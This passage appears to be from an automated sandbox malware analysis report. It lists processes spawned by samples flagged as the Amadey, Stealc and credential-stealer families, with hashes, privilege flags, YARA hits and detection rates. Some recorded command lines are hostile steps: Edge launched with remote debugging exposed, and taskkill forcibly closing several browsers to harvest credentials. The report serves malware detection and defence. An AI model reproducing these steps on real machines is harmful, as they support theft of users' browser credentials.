                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                      Start time:04:54:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                      Start time:04:54:37
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6904 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                      Start time:04:54:37
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7068 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                      Start time:04:54:37
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                      Start time:04:54:37
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                      Start time:04:54:50
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKJEGCFBGDH.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                      Start time:04:54:50
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                      Start time:04:54:50
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\DocumentsKJEGCFBGDH.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\DocumentsKJEGCFBGDH.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                                                                                                                      File size:1'957'888 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8016C72A6E4BF40375E31E867F487FA7
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2653034486.0000000000991000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.2612784932.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                      Start time:04:54:56
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x460000
                                                                                                                                                                                                                                                                                      File size:1'957'888 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8016C72A6E4BF40375E31E867F487FA7
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000003.2667219180.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                      Start time:04:55:00
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x460000
                                                                                                                                                                                                                                                                                      File size:1'957'888 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8016C72A6E4BF40375E31E867F487FA7
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000003.2703429539.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.2743822053.0000000000461000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                      Start time:04:55:09
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xf90000
                                                                                                                                                                                                                                                                                      File size:4'387'328 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:E0DAF3617F84AF41981769A31ED23565
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                                                      Start time:04:55:14
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                                                                                                                      File size:1'858'560 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C295093AA18965205A72349F476A9CF3
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2909497390.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2930042861.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2930115456.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2868675693.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2866546658.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2925047603.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2897278924.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                      Start time:04:55:19
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xe40000
                                                                                                                                                                                                                                                                                      File size:1'806'336 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:7A3B3989F1F3647DC9188A185B345D43
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000003.2894414344.0000000005820000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2938763299.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                                                      Start time:04:55:22
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                      Start time:04:55:24
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                                                                                                                                                      File size:922'624 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:68D659F5943261E1EF96EF4BF5EE50A0
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 0000001C.00000003.2922185232.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                      Start time:04:55:24
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                      Start time:04:55:24
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                                                                      Start time:04:55:27
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                      Start time:04:55:27
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                      Start time:04:55:27
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                                                                                                                      File size:1'858'560 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C295093AA18965205A72349F476A9CF3
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3029423609.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3141958097.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3029009486.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3115502642.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3126917741.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                      Start time:04:55:27
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                      Start time:04:55:27
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                                                                      Start time:04:55:28
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:37
